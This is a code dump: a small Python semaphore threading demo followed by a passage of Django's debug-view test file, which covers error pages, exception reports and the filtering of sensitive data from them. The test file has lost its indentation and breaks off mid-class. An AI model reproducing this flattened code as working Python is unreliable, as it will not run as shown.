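def notify_all_demo(n_threads=50):
    sem = threading.Semaphore(1)
    results = []
    lock = threading.Lock()

    def worker(i):
        if sem.acquire(timeout=5):
            with lock:
                results.append(i)
            sem.release()

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(n_threads)]
    with sem:                      # hold the semaphore while the workers start up
        for t in threads:
            t.start()
    for t in threads:
        t.join()
    assert len(results) == n_threads
    return results

if __name__ == '__main__':
    print('%d workers acquired the semaphore' % len(notify_all_demo()))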
|
test_debug.py
|
import importlib
import inspect
import os
import re
import sys
import tempfile
import threading
from io import StringIO
from pathlib import Path
from django.core import mail
from django.core.files.uploadedfile import SimpleUploadedFile
from django.db import DatabaseError, connection
from django.shortcuts import render
from django.template import TemplateDoesNotExist
from django.test import RequestFactory, SimpleTestCase, override_settings
from django.test.utils import LoggingCaptureMixin
from django.urls import path, reverse
from django.utils.functional import SimpleLazyObject
from django.utils.safestring import mark_safe
from django.views.debug import (
CLEANSED_SUBSTITUTE, CallableSettingWrapper, ExceptionReporter,
cleanse_setting, technical_500_response,
)
from ..views import (
custom_exception_reporter_filter_view, index_page,
multivalue_dict_key_error, non_sensitive_view, paranoid_view,
sensitive_args_function_caller, sensitive_kwargs_function_caller,
sensitive_method_view, sensitive_view,
)
class User:
def __str__(self):
return 'jacob'
class WithoutEmptyPathUrls:
urlpatterns = [path('url/', index_page, name='url')]
class CallableSettingWrapperTests(SimpleTestCase):
""" Unittests for CallableSettingWrapper
"""
def test_repr(self):
class WrappedCallable:
def __repr__(self):
return "repr from the wrapped callable"
def __call__(self):
pass
actual = repr(CallableSettingWrapper(WrappedCallable()))
self.assertEqual(actual, "repr from the wrapped callable")
@override_settings(DEBUG=True, ROOT_URLCONF='view_tests.urls')
class DebugViewTests(SimpleTestCase):
def test_files(self):
with self.assertLogs('django.request', 'ERROR'):
response = self.client.get('/raises/')
self.assertEqual(response.status_code, 500)
data = {
'file_data.txt': SimpleUploadedFile('file_data.txt', b'haha'),
}
with self.assertLogs('django.request', 'ERROR'):
response = self.client.post('/raises/', data)
self.assertContains(response, 'file_data.txt', status_code=500)
self.assertNotContains(response, 'haha', status_code=500)
def test_400(self):
# When DEBUG=True, technical_500_template() is called.
with self.assertLogs('django.security', 'WARNING'):
response = self.client.get('/raises400/')
self.assertContains(response, '<div class="context" id="', status_code=400)
# Ensure no 403.html template exists to test the default case.
@override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
}])
def test_403(self):
response = self.client.get('/raises403/')
self.assertContains(response, '<h1>403 Forbidden</h1>', status_code=403)
# Set up a test 403.html template.
@override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'OPTIONS': {
'loaders': [
('django.template.loaders.locmem.Loader', {
'403.html': 'This is a test template for a 403 error ({{ exception }}).',
}),
],
},
}])
def test_403_template(self):
response = self.client.get('/raises403/')
self.assertContains(response, 'test template', status_code=403)
self.assertContains(response, '(Insufficient Permissions).', status_code=403)
def test_404(self):
response = self.client.get('/raises404/')
self.assertEqual(response.status_code, 404)
self.assertContains(response, "<code>not-in-urls</code>, didn't match", status_code=404)
def test_404_not_in_urls(self):
response = self.client.get('/not-in-urls')
self.assertNotContains(response, "Raised by:", status_code=404)
self.assertContains(response, "Django tried these URL patterns", status_code=404)
self.assertContains(response, "<code>not-in-urls</code>, didn't match", status_code=404)
# Pattern and view name of a RegexURLPattern appear.
self.assertContains(response, r"^regex-post/(?P<pk>[0-9]+)/$", status_code=404)
self.assertContains(response, "[name='regex-post']", status_code=404)
# Pattern and view name of a RoutePattern appear.
self.assertContains(response, r"path-post/<int:pk>/", status_code=404)
self.assertContains(response, "[name='path-post']", status_code=404)
@override_settings(ROOT_URLCONF=WithoutEmptyPathUrls)
def test_404_empty_path_not_in_urls(self):
response = self.client.get('/')
self.assertContains(response, "The empty path didn't match any of these.", status_code=404)
def test_technical_404(self):
response = self.client.get('/technical404/')
self.assertContains(response, "Raised by:", status_code=404)
self.assertContains(response, "view_tests.views.technical404", status_code=404)
def test_classbased_technical_404(self):
response = self.client.get('/classbased404/')
self.assertContains(response, "Raised by:", status_code=404)
self.assertContains(response, "view_tests.views.Http404View", status_code=404)
def test_non_l10ned_numeric_ids(self):
"""
Numeric IDs and fancy traceback context block line numbers shouldn't be localized.
"""
with self.settings(DEBUG=True, USE_L10N=True):
with self.assertLogs('django.request', 'ERROR'):
response = self.client.get('/raises500/')
# We look for an HTML fragment of the form
# '<div class="context" id="c38123208">', not '<div class="context" id="c38,123,208"'
self.assertContains(response, '<div class="context" id="', status_code=500)
match = re.search(b'<div class="context" id="(?P<id>[^"]+)">', response.content)
self.assertIsNotNone(match)
id_repr = match.group('id')
self.assertFalse(
re.search(b'[^c0-9]', id_repr),
"Numeric IDs in debug response HTML page shouldn't be localized (value: %s)." % id_repr.decode()
)
def test_template_exceptions(self):
with self.assertLogs('django.request', 'ERROR'):
try:
self.client.get(reverse('template_exception'))
except Exception:
raising_loc = inspect.trace()[-1][-2][0].strip()
self.assertNotEqual(
raising_loc.find("raise Exception('boom')"), -1,
"Failed to find 'raise Exception' in last frame of "
"traceback, instead found: %s" % raising_loc
)
def test_template_loader_postmortem(self):
"""Tests for not existing file"""
template_name = "notfound.html"
with tempfile.NamedTemporaryFile(prefix=template_name) as tmpfile:
tempdir = os.path.dirname(tmpfile.name)
template_path = os.path.join(tempdir, template_name)
with override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [tempdir],
}]), self.assertLogs('django.request', 'ERROR'):
response = self.client.get(reverse('raises_template_does_not_exist', kwargs={"path": template_name}))
self.assertContains(response, "%s (Source does not exist)" % template_path, status_code=500, count=2)
# Assert as HTML.
self.assertContains(
response,
'<li><code>django.template.loaders.filesystem.Loader</code>: '
'%s (Source does not exist)</li>' % os.path.join(tempdir, 'notfound.html'),
status_code=500,
html=True,
)
def test_no_template_source_loaders(self):
"""
Make sure if you don't specify a template, the debug view doesn't blow up.
"""
with self.assertLogs('django.request', 'ERROR'):
with self.assertRaises(TemplateDoesNotExist):
self.client.get('/render_no_template/')
@override_settings(ROOT_URLCONF='view_tests.default_urls')
def test_default_urlconf_template(self):
"""
Make sure that the default URLconf template is shown instead
of the technical 404 page, if the user has not altered their
URLconf yet.
"""
response = self.client.get('/')
self.assertContains(
response,
"<h2>The install worked successfully! Congratulations!</h2>"
)
@override_settings(ROOT_URLCONF='view_tests.regression_21530_urls')
def test_regression_21530(self):
"""
Regression test for bug #21530.
If the admin app include is replaced with exactly one url
pattern, then the technical 404 template should be displayed.
The bug here was that an AttributeError caused a 500 response.
"""
response = self.client.get('/')
self.assertContains(
response,
"Page not found <span>(404)</span>",
status_code=404
)
class DebugViewQueriesAllowedTests(SimpleTestCase):
# May need a query to initialize MySQL connection
databases = {'default'}
def test_handle_db_exception(self):
"""
Ensure the debug view works when a database exception is raised by
performing an invalid query and passing the exception to the debug view.
"""
with connection.cursor() as cursor:
try:
cursor.execute('INVALID SQL')
except DatabaseError:
exc_info = sys.exc_info()
rf = RequestFactory()
response = technical_500_response(rf.get('/'), *exc_info)
self.assertContains(response, 'OperationalError at /', status_code=500)
@override_settings(
DEBUG=True,
ROOT_URLCONF='view_tests.urls',
# No template directories are configured, so no templates will be found.
TEMPLATES=[{
'BACKEND': 'django.template.backends.dummy.TemplateStrings',
}],
)
class NonDjangoTemplatesDebugViewTests(SimpleTestCase):
def test_400(self):
# When DEBUG=True, technical_500_template() is called.
with self.assertLogs('django.security', 'WARNING'):
response = self.client.get('/raises400/')
self.assertContains(response, '<div class="context" id="', status_code=400)
def test_403(self):
response = self.client.get('/raises403/')
self.assertContains(response, '<h1>403 Forbidden</h1>', status_code=403)
def test_404(self):
response = self.client.get('/raises404/')
self.assertEqual(response.status_code, 404)
def test_template_not_found_error(self):
# Raises a TemplateDoesNotExist exception and shows the debug view.
url = reverse('raises_template_does_not_exist', kwargs={"path": "notfound.html"})
with self.assertLogs('django.request', 'ERROR'):
response = self.client.get(url)
self.assertContains(response, '<div class="context" id="', status_code=500)
class ExceptionReporterTests(SimpleTestCase):
rf = RequestFactory()
def test_request_and_exception(self):
"A simple exception report can be generated"
try:
request = self.rf.get('/test_view/')
request.user = User()
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>ValueError at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">Can&#x27;t find my keys</pre>', html)
self.assertIn('<th>Request Method:</th>', html)
self.assertIn('<th>Request URL:</th>', html)
self.assertIn('<h3 id="user-info">USER</h3>', html)
self.assertIn('<p>jacob</p>', html)
self.assertIn('<th>Exception Type:</th>', html)
self.assertIn('<th>Exception Value:</th>', html)
self.assertIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertNotIn('<p>Request data not supplied</p>', html)
self.assertIn('<p>No POST data</p>', html)
def test_no_request(self):
"An exception report can be generated without request"
try:
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>ValueError</h1>', html)
self.assertIn('<pre class="exception_value">Can&#x27;t find my keys</pre>', html)
self.assertNotIn('<th>Request Method:</th>', html)
self.assertNotIn('<th>Request URL:</th>', html)
self.assertNotIn('<h3 id="user-info">USER</h3>', html)
self.assertIn('<th>Exception Type:</th>', html)
self.assertIn('<th>Exception Value:</th>', html)
self.assertIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertIn('<p>Request data not supplied</p>', html)
def test_eol_support(self):
"""The ExceptionReporter supports Unix, Windows and Macintosh EOL markers"""
LINES = ['print %d' % i for i in range(1, 6)]
reporter = ExceptionReporter(None, None, None, None)
for newline in ['\n', '\r\n', '\r']:
fd, filename = tempfile.mkstemp(text=False)
os.write(fd, (newline.join(LINES) + newline).encode())
os.close(fd)
try:
self.assertEqual(
reporter._get_lines_from_file(filename, 3, 2),
(1, LINES[1:3], LINES[3], LINES[4:])
)
finally:
os.unlink(filename)
def test_no_exception(self):
"An exception report can be generated for just a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>Report at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">No exception message supplied</pre>', html)
self.assertIn('<th>Request Method:</th>', html)
self.assertIn('<th>Request URL:</th>', html)
self.assertNotIn('<th>Exception Type:</th>', html)
self.assertNotIn('<th>Exception Value:</th>', html)
self.assertNotIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertNotIn('<p>Request data not supplied</p>', html)
def test_reporting_of_nested_exceptions(self):
request = self.rf.get('/test_view/')
try:
try:
raise AttributeError(mark_safe('<p>Top level</p>'))
except AttributeError as explicit:
try:
raise ValueError(mark_safe('<p>Second exception</p>')) from explicit
except ValueError:
raise IndexError(mark_safe('<p>Final exception</p>'))
except Exception:
# Custom exception handler, just pass it into ExceptionReporter
exc_type, exc_value, tb = sys.exc_info()
explicit_exc = 'The above exception ({0}) was the direct cause of the following exception:'
implicit_exc = 'During handling of the above exception ({0}), another exception occurred:'
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
# Both messages appear twice on the page -- once rendered as html,
# once as plain text (for pastebin)
self.assertEqual(2, html.count(explicit_exc.format('<p>Top level</p>')))
self.assertEqual(2, html.count(implicit_exc.format('<p>Second exception</p>')))
self.assertEqual(10, html.count('<p>Final exception</p>'))
text = reporter.get_traceback_text()
self.assertIn(explicit_exc.format('<p>Top level</p>'), text)
self.assertIn(implicit_exc.format('<p>Second exception</p>'), text)
self.assertEqual(3, text.count('<p>Final exception</p>'))
def test_reporting_frames_without_source(self):
try:
source = "def funcName():\n raise Error('Whoops')\nfuncName()"
namespace = {}
code = compile(source, 'generated', 'exec')
exec(code, namespace)
except Exception:
exc_type, exc_value, tb = sys.exc_info()
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
frames = reporter.get_traceback_frames()
last_frame = frames[-1]
self.assertEqual(last_frame['context_line'], '<source code not available>')
self.assertEqual(last_frame['filename'], 'generated')
self.assertEqual(last_frame['function'], 'funcName')
self.assertEqual(last_frame['lineno'], 2)
html = reporter.get_traceback_html()
self.assertIn('generated in funcName', html)
text = reporter.get_traceback_text()
self.assertIn('"generated" in funcName', text)
def test_reporting_frames_for_cyclic_reference(self):
try:
def test_func():
try:
raise RuntimeError('outer') from RuntimeError('inner')
except RuntimeError as exc:
raise exc.__cause__
test_func()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
def generate_traceback_frames(*args, **kwargs):
nonlocal tb_frames
tb_frames = reporter.get_traceback_frames()
tb_frames = None
tb_generator = threading.Thread(target=generate_traceback_frames, daemon=True)
tb_generator.start()
tb_generator.join(timeout=5)
if tb_generator.is_alive():
# tb_generator is a daemon that runs until the main thread/process
# exits. This is resource heavy when running the full test suite.
# Setting the following values to None makes
# reporter.get_traceback_frames() exit early.
exc_value.__traceback__ = exc_value.__context__ = exc_value.__cause__ = None
tb_generator.join()
self.fail('Cyclic reference in Exception Reporter.get_traceback_frames()')
if tb_frames is None:
# Can happen if the thread generating the traceback was killed
# or an exception occurred while generating the traceback.
self.fail('Traceback generation failed')
last_frame = tb_frames[-1]
self.assertIn('raise exc.__cause__', last_frame['context_line'])
self.assertEqual(last_frame['filename'], __file__)
self.assertEqual(last_frame['function'], 'test_func')
def test_request_and_message(self):
"A message can be provided in addition to a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, "I'm a little teapot", None)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>Report at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">I&#x27;m a little teapot</pre>', html)
self.assertIn('<th>Request Method:</th>', html)
self.assertIn('<th>Request URL:</th>', html)
self.assertNotIn('<th>Exception Type:</th>', html)
self.assertNotIn('<th>Exception Value:</th>', html)
self.assertNotIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertNotIn('<p>Request data not supplied</p>', html)
def test_message_only(self):
reporter = ExceptionReporter(None, None, "I'm a little teapot", None)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>Report</h1>', html)
self.assertIn('<pre class="exception_value">I&#x27;m a little teapot</pre>', html)
self.assertNotIn('<th>Request Method:</th>', html)
self.assertNotIn('<th>Request URL:</th>', html)
self.assertNotIn('<th>Exception Type:</th>', html)
self.assertNotIn('<th>Exception Value:</th>', html)
self.assertNotIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertIn('<p>Request data not supplied</p>', html)
def test_non_utf8_values_handling(self):
"Non-UTF-8 exceptions/values should not make the output generation choke."
try:
class NonUtf8Output(Exception):
def __repr__(self):
return b'EXC\xe9EXC'
somevar = b'VAL\xe9VAL' # NOQA
raise NonUtf8Output()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('VAL\\xe9VAL', html)
self.assertIn('EXC\\xe9EXC', html)
def test_local_variable_escaping(self):
"""Safe strings in local variables are escaped."""
try:
local = mark_safe('<p>Local variable</p>')
raise ValueError(local)
except Exception:
exc_type, exc_value, tb = sys.exc_info()
html = ExceptionReporter(None, exc_type, exc_value, tb).get_traceback_html()
self.assertIn('<td class="code"><pre>&#x27;&lt;p&gt;Local variable&lt;/p&gt;&#x27;</pre></td>', html)
def test_unprintable_values_handling(self):
"Unprintable values should not make the output generation choke."
try:
class OomOutput:
def __repr__(self):
raise MemoryError('OOM')
oomvalue = OomOutput() # NOQA
raise ValueError()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('<td class="code"><pre>Error in formatting', html)
def test_too_large_values_handling(self):
"Large values should not create a large HTML."
large = 256 * 1024
repr_of_str_adds = len(repr(''))
try:
class LargeOutput:
def __repr__(self):
return repr('A' * large)
largevalue = LargeOutput() # NOQA
raise ValueError()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertEqual(len(html) // 1024 // 128, 0) # still fit in 128Kb
self.assertIn('<trimmed %d bytes string>' % (large + repr_of_str_adds,), html)
def test_encoding_error(self):
"""
A UnicodeError displays a portion of the problematic string. HTML in
safe strings is escaped.
"""
try:
mark_safe('abcdefghijkl<p>mnὀp</p>qrstuwxyz').encode('ascii')
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('<h2>Unicode error hint</h2>', html)
self.assertIn('The string that could not be encoded/decoded was: ', html)
self.assertIn('<strong>&lt;p&gt;mnὀp&lt;/p&gt;</strong>', html)
def test_unfrozen_importlib(self):
"""
importlib is not a frozen app, but its loader thinks it's frozen which
results in an ImportError. Refs #21443.
"""
try:
request = self.rf.get('/test_view/')
importlib.import_module('abc.def.invalid.name')
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>ModuleNotFoundError at /test_view/</h1>', html)
def test_ignore_traceback_evaluation_exceptions(self):
"""
Don't trip over exceptions generated by crafted objects when
evaluating them while cleansing (#24455).
"""
class BrokenEvaluation(Exception):
pass
def broken_setup():
raise BrokenEvaluation
request = self.rf.get('/test_view/')
broken_lazy = SimpleLazyObject(broken_setup)
try:
bool(broken_lazy)
except BrokenEvaluation:
exc_type, exc_value, tb = sys.exc_info()
self.assertIn(
"BrokenEvaluation",
ExceptionReporter(request, exc_type, exc_value, tb).get_traceback_html(),
"Evaluation exception reason not mentioned in traceback"
)
@override_settings(ALLOWED_HOSTS='example.com')
def test_disallowed_host(self):
"An exception report can be generated even for a disallowed host."
request = self.rf.get('/', HTTP_HOST='evil.com')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertIn("http://evil.com/", html)
def test_request_with_items_key(self):
"""
An exception report can be generated for requests with 'items' in
request GET, POST, FILES, or COOKIES QueryDicts.
"""
value = '<td>items</td><td class="code"><pre>&#x27;Oops&#x27;</pre></td>'
# GET
request = self.rf.get('/test_view/?items=Oops')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML(value, html)
# POST
request = self.rf.post('/test_view/', data={'items': 'Oops'})
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML(value, html)
# FILES
fp = StringIO('filecontent')
request = self.rf.post('/test_view/', data={'name': 'filename', 'items': fp})
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML(
'<td>items</td><td class="code"><pre>&lt;InMemoryUploadedFile: '
'items (application/octet-stream)&gt;</pre></td>',
html
)
# COOKIES
rf = RequestFactory()
rf.cookies['items'] = 'Oops'
request = rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML('<td>items</td><td class="code"><pre>&#x27;Oops&#x27;</pre></td>', html)
def test_exception_fetching_user(self):
"""
The error page can be rendered if the current user can't be retrieved
(such as when the database is unavailable).
"""
class ExceptionUser:
def __str__(self):
raise Exception()
request = self.rf.get('/test_view/')
request.user = ExceptionUser()
try:
raise ValueError('Oops')
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>ValueError at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">Oops</pre>', html)
self.assertIn('<h3 id="user-info">USER</h3>', html)
self.assertIn('<p>[unable to retrieve the current user]</p>', html)
text = reporter.get_traceback_text()
self.assertIn('USER: [unable to retrieve the current user]', text)
class PlainTextReportTests(SimpleTestCase):
rf = RequestFactory()
def test_request_and_exception(self):
"A simple exception report can be generated"
try:
request = self.rf.get('/test_view/')
request.user = User()
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
text = reporter.get_traceback_text()
self.assertIn('ValueError at /test_view/', text)
self.assertIn("Can't find my keys", text)
self.assertIn('Request Method:', text)
self.assertIn('Request URL:', text)
self.assertIn('USER: jacob', text)
self.assertIn('Exception Type:', text)
self.assertIn('Exception Value:', text)
self.assertIn('Traceback:', text)
self.assertIn('Request information:', text)
self.assertNotIn('Request data not supplied', text)
def test_no_request(self):
"An exception report can be generated without request"
try:
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
text = reporter.get_traceback_text()
self.assertIn('ValueError', text)
self.assertIn("Can't find my keys", text)
self.assertNotIn('Request Method:', text)
self.assertNotIn('Request URL:', text)
self.assertNotIn('USER:', text)
self.assertIn('Exception Type:', text)
self.assertIn('Exception Value:', text)
self.assertIn('Traceback:', text)
self.assertIn('Request data not supplied', text)
def test_no_exception(self):
"An exception report can be generated for just a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
reporter.get_traceback_text()
def test_request_and_message(self):
"A message can be provided in addition to a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, "I'm a little teapot", None)
reporter.get_traceback_text()
@override_settings(DEBUG=True)
def test_template_exception(self):
request = self.rf.get('/test_view/')
try:
render(request, 'debug/template_error.html')
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
text = reporter.get_traceback_text()
templ_path = Path(Path(__file__).parent.parent, 'templates', 'debug', 'template_error.html')
self.assertIn(
'Template error:\n'
'In template %(path)s, error at line 2\n'
' \'cycle\' tag requires at least two arguments\n'
' 1 : Template with error:\n'
' 2 : {%% cycle %%} \n'
' 3 : ' % {'path': templ_path},
text
)
def test_request_with_items_key(self):
"""
An exception report can be generated for requests with 'items' in
request GET, POST, FILES, or COOKIES QueryDicts.
"""
# GET
request = self.rf.get('/test_view/?items=Oops')
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("items = 'Oops'", text)
# POST
request = self.rf.post('/test_view/', data={'items': 'Oops'})
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("items = 'Oops'", text)
# FILES
fp = StringIO('filecontent')
request = self.rf.post('/test_view/', data={'name': 'filename', 'items': fp})
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn('items = <InMemoryUploadedFile:', text)
# COOKIES
rf = RequestFactory()
rf.cookies['items'] = 'Oops'
request = rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("items = 'Oops'", text)
def test_message_only(self):
reporter = ExceptionReporter(None, None, "I'm a little teapot", None)
reporter.get_traceback_text()
@override_settings(ALLOWED_HOSTS='example.com')
def test_disallowed_host(self):
"An exception report can be generated even for a disallowed host."
request = self.rf.get('/', HTTP_HOST='evil.com')
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("http://evil.com/", text)
class ExceptionReportTestMixin:
# Mixin used in the ExceptionReporterFilterTests and
# AjaxResponseExceptionReporterFilter tests below
breakfast_data = {
'sausage-key': 'sausage-value',
'baked-beans-key': 'baked-beans-value',
'hash-brown-key': 'hash-brown-value',
'bacon-key': 'bacon-value',
}
def verify_unsafe_response(self, view, check_for_vars=True,
check_for_POST_params=True):
"""
Asserts that potentially sensitive info is displayed in the response.
"""
request = self.rf.post('/some_url/', self.breakfast_data)
response = view(request)
if check_for_vars:
# All variables are shown.
self.assertContains(response, 'cooked_eggs', status_code=500)
self.assertContains(response, 'scrambled', status_code=500)
self.assertContains(response, 'sauce', status_code=500)
self.assertContains(response, 'worcestershire', status_code=500)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters are shown.
self.assertContains(response, k, status_code=500)
self.assertContains(response, v, status_code=500)
def verify_safe_response(self, view, check_for_vars=True,
check_for_POST_params=True):
"""
Asserts that certain sensitive info is not displayed in the response.
"""
request = self.rf.post('/some_url/', self.breakfast_data)
response = view(request)
if check_for_vars:
# Non-sensitive variable's name and value are shown.
self.assertContains(response, 'cooked_eggs', status_code=500)
self.assertContains(response, 'scrambled', status_code=500)
# Sensitive variable's name is shown but not its value.
self.assertContains(response, 'sauce', status_code=500)
self.assertNotContains(response, 'worcestershire', status_code=500)
if check_for_POST_params:
for k in self.breakfast_data:
# All POST parameters' names are shown.
self.assertContains(response, k, status_code=500)
# Non-sensitive POST parameters' values are shown.
self.assertContains(response, 'baked-beans-value', status_code=500)
self.assertContains(response, 'hash-brown-value', status_code=500)
# Sensitive POST parameters' values are not shown.
self.assertNotContains(response, 'sausage-value', status_code=500)
self.assertNotContains(response, 'bacon-value', status_code=500)
def verify_paranoid_response(self, view, check_for_vars=True,
check_for_POST_params=True):
"""
Asserts that no variables or POST parameters are displayed in the response.
"""
request = self.rf.post('/some_url/', self.breakfast_data)
response = view(request)
if check_for_vars:
# Show variable names but not their values.
self.assertContains(response, 'cooked_eggs', status_code=500)
self.assertNotContains(response, 'scrambled', status_code=500)
self.assertContains(response, 'sauce', status_code=500)
self.assertNotContains(response, 'worcestershire', status_code=500)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters' names are shown.
self.assertContains(response, k, status_code=500)
# No POST parameters' values are shown.
self.assertNotContains(response, v, status_code=500)
def verify_unsafe_email(self, view, check_for_POST_params=True):
"""
Asserts that potentially sensitive info is displayed in the email report.
"""
with self.settings(ADMINS=[('Admin', 'admin@fattie-breakie.com')]):
mail.outbox = [] # Empty outbox
request = self.rf.post('/some_url/', self.breakfast_data)
view(request)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
# Frames vars are never shown in plain text email reports.
body_plain = str(email.body)
self.assertNotIn('cooked_eggs', body_plain)
self.assertNotIn('scrambled', body_plain)
self.assertNotIn('sauce', body_plain)
self.assertNotIn('worcestershire', body_plain)
# Frames vars are shown in html email reports.
body_html = str(email.alternatives[0][0])
self.assertIn('cooked_eggs', body_html)
self.assertIn('scrambled', body_html)
self.assertIn('sauce', body_html)
self.assertIn('worcestershire', body_html)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters are shown.
self.assertIn(k, body_plain)
self.assertIn(v, body_plain)
self.assertIn(k, body_html)
self.assertIn(v, body_html)
def verify_safe_email(self, view, check_for_POST_params=True):
"""
Asserts that certain sensitive info is not displayed in the email report.
"""
with self.settings(ADMINS=[('Admin', 'admin@fattie-breakie.com')]):
mail.outbox = [] # Empty outbox
request = self.rf.post('/some_url/', self.breakfast_data)
view(request)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
# Frames vars are never shown in plain text email reports.
body_plain = str(email.body)
self.assertNotIn('cooked_eggs', body_plain)
self.assertNotIn('scrambled', body_plain)
self.assertNotIn('sauce', body_plain)
self.assertNotIn('worcestershire', body_plain)
# Frames vars are shown in html email reports.
body_html = str(email.alternatives[0][0])
self.assertIn('cooked_eggs', body_html)
self.assertIn('scrambled', body_html)
self.assertIn('sauce', body_html)
self.assertNotIn('worcestershire', body_html)
if check_for_POST_params:
for k in self.breakfast_data:
# All POST parameters' names are shown.
self.assertIn(k, body_plain)
# Non-sensitive POST parameters' values are shown.
self.assertIn('baked-beans-value', body_plain)
self.assertIn('hash-brown-value', body_plain)
self.assertIn('baked-beans-value', body_html)
self.assertIn('hash-brown-value', body_html)
# Sensitive POST parameters' values are not shown.
self.assertNotIn('sausage-value', body_plain)
self.assertNotIn('bacon-value', body_plain)
self.assertNotIn('sausage-value', body_html)
self.assertNotIn('bacon-value', body_html)
def verify_paranoid_email(self, view):
"""
Asserts that no variables or POST parameters are displayed in the email report.
"""
with self.settings(ADMINS=[('Admin', 'admin@fattie-breakie.com')]):
mail.outbox = [] # Empty outbox
request = self.rf.post('/some_url/', self.breakfast_data)
view(request)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
# Frames vars are never shown in plain text email reports.
body = str(email.body)
self.assertNotIn('cooked_eggs', body)
self.assertNotIn('scrambled', body)
self.assertNotIn('sauce', body)
self.assertNotIn('worcestershire', body)
for k, v in self.breakfast_data.items():
# All POST parameters' names are shown.
self.assertIn(k, body)
# No POST parameters' values are shown.
self.assertNotIn(v, body)
@override_settings(ROOT_URLCONF='view_tests.urls')
class ExceptionReporterFilterTests(ExceptionReportTestMixin, LoggingCaptureMixin, SimpleTestCase):
"""
Sensitive information can be filtered out of error reports (#14614).
"""
rf = RequestFactory()
def test_non_sensitive_request(self):
"""
Everything (request info and frame variables) can be seen
in the default error reports for non-sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(non_sensitive_view)
self.verify_unsafe_email(non_sensitive_view)
with self.settings(DEBUG=False):
self.verify_unsafe_response(non_sensitive_view)
self.verify_unsafe_email(non_sensitive_view)
def test_sensitive_request(self):
"""
Sensitive POST parameters and frame variables cannot be
seen in the default error reports for sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_view)
self.verify_unsafe_email(sensitive_view)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_view)
